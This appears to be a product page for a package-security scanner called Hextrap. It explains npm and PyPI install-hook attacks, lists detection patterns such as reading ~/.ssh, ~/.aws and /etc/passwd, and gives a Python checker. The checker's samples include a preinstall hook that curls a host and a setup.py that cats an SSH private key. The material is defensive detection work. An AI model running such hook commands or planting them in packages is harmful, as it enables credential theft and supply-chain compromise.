Threat Detection

Install Hook Analysis

Install hooks run code the moment you install a package — before you ever import it. Malicious packages abuse preinstall scripts and setup.py to execute payloads during installation, when your guard is down.

The Install Hook Attack Surface

Package managers allow packages to execute arbitrary code during installation. In npm, this happens through preinstall, postinstall, and install scripts defined in package.json. In Python, setup.py runs during pip install and can execute any Python code.

This is the most dangerous moment in the package lifecycle. The code runs with the installing user's full permissions, has network access, can read the filesystem, and executes before the developer has any chance to review the package source.

What Hextrap Scans For

The Phase 2 content analyzer inspects install-time scripts for patterns that indicate malicious intent:

npm Scripts

  • child_process imports — spawning shell commands from Node.js
  • exec() / execSync() calls with encoded or obfuscated arguments
  • Network requests via http, https, or node-fetch in install scripts
  • File system operations writing outside the package directory

Python setup.py

  • subprocess.Popen() or os.system() calls
  • socket imports and network connections
  • urllib or requests usage for downloading payloads
  • exec() / eval() with encoded arguments
  • Reading sensitive files (~/.ssh, ~/.aws, /etc/passwd)
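The two pattern lists above can be turned into a small static checker. The following is an added example written for this page, not Hextrap's own code: it applies constructed heuristic regexes to npm lifecycle scripts in package.json and walks the AST of a setup.py looking for the call names and sensitive paths listed above. The pattern names, regexes and sample inputs are assumptions made for illustration.

```python
import ast
import json
import re

NPM_HOOKS = ("preinstall", "install", "postinstall")  # run automatically by npm
# Heuristic regexes for hook commands (constructed for this example).
NPM_PATTERNS = {
    "child_process": re.compile(r"child_process"),
    "network_fetch": re.compile(r"\b(curl|wget|node-fetch|https?\.get)\b"),
    "encoded_arg": re.compile(r"base64|[A-Za-z0-9+/]{40,}={0,2}"),
    "eval_exec": re.compile(r"\b(exec|execSync|eval)\s*\("),
}
# Call names and paths the page lists as suspicious in setup.py.
PY_SUSPICIOUS_CALLS = {"subprocess.Popen", "os.system", "exec", "eval",
                       "socket.socket", "urllib.request.urlopen", "requests.get"}
PY_SENSITIVE_PATHS = ("~/.ssh", "~/.aws", "/etc/passwd")

def scan_package_json(text):
    """Return (hook, pattern) pairs found in npm lifecycle scripts."""
    scripts = json.loads(text).get("scripts", {})
    return [(hook, name) for hook in NPM_HOOKS
            for name, rx in NPM_PATTERNS.items() if rx.search(scripts.get(hook, ""))]

def _dotted(node):
    """Rebuild 'pkg.attr' from an ast Name/Attribute chain."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        return _dotted(node.value) + "." + node.attr
    return ""

def scan_setup_py(source):
    """Return suspicious calls and sensitive-path strings found in setup.py."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and _dotted(node.func) in PY_SUSPICIOUS_CALLS:
            findings.append(("call", _dotted(node.func)))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            findings += [("sensitive_path", p) for p in PY_SENSITIVE_PATHS if p in node.value]
    return findings

# Constructed samples: a hook that spawns a shell fetch, and a setup.py that shells out.
SAMPLE_PACKAGE_JSON = json.dumps({"scripts": {"preinstall":
    "node -e \"require('child_process').exec('curl -s http://example.invalid/x')\""}})
SAMPLE_SETUP_PY = "import os, subprocess\nfrom setuptools import setup\n" \
    "subprocess.Popen(['sh', '-c', 'cat ~/.ssh/id_rsa'])\nos.system('id')\nsetup(name='demo')\n"

if __name__ == "__main__":
    print(scan_package_json(SAMPLE_PACKAGE_JSON))
    print(scan_setup_py(SAMPLE_SETUP_PY))
```

A real analyzer would also follow `node` and `python -c` one-liners into the files they invoke and treat any finding as a HIGH signal to block the install.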

Why This Matters

Install hooks are the primary delivery mechanism for supply chain attacks. Over 90% of malicious packages discovered on npm and PyPI use install hooks to execute their payloads. By analyzing these scripts before allowing installation, Hextrap blocks the most common attack vector.

Legitimate packages do use install hooks — for native compilation, binary downloads, or post-install setup. The analyzer distinguishes between these benign uses and suspicious patterns like encoded commands, credential access, and external network calls to unknown hosts.

Severity: HIGH
Signal Type: INSTALL_HOOK
Detection Phase: Phase 2 (Content Analysis)
Registries: PyPI, npm
Method: Script pattern analysis
Scans: package.json scripts, setup.py, setup.cfg

Real-World Example

// package.json
{
  "scripts": {
    "preinstall": "node -e \"require('child_process').exec('curl ...')\""
  }
}

ERROR: Package blocked by Hextrap
Signal: INSTALL_HOOK (HIGH)

Block Malicious Install Scripts

Analyze every install hook before code reaches your machine